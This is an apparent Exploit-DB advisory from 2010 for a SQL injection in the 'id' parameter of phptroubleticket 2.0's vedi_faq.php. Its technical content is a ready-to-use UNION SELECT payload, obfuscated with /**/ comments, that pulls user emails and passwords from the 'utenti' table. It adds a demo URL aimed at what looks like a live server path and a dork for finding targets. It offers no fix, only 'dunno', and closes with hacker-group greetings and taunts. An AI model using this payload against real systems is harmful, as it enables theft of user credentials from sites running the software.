phptroubleticket 2.0 – ‘id’ SQL Injection

  • 作者: kaMtiEz
    日期: 2010-03-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11609/
  • #############################################################################################################
    ## phptroubleticket SQL injection (id)			 ##
    ## Author : kaMtiEz (kamzcrew@yahoo.com)								 ##
    ## Homepage : http://www.indonesiancoder.com	 						 ##
    ## Date : 1 march, 2010 						 ##
    #############################################################################################################
    
    [ Software Information ]
    
    [+] Vendor : http://www.phptroubleticket.org/
    [+] Download : http://www.phptroubleticket.org/downloads.html
    [+] version : 2.0 / lower maybe also affected
    [+] Vulnerability : SQL
    [+] Dork : "CiHuY"
    [+] LOCATION : INDONESIA - JOGJA
    #############################################################################################################
    
    [ Vulnerable File ]
    
    http://127.0.0.1/[kaMtiEz]/vedi_faq.php?id=[INDONESIANCODER]
    
    [ XpL ]
    
    /**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--
    
    [ DEMO ]
    
    http://server/ingegneria/new/assistenza/vedi_faq.php?id=666/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--
    
    [ FIX ]
    
    dunno :">
    
    
    #############################################################################################################
    
    [ Thx TO ]
    
    [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
    [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
    [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
    [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
    
    [ NOTE ] 
    
    [+] Ayy : U will be owned ;]
    [+] Don Tukulesto : kemana kamu woeeeee
    [+] IBL13Z : belajar terus yak ;]
    
    [ QUOTE ]
    
    [+] we are not dead INDONESIANCODER stil r0x
    [+] nothing secure ..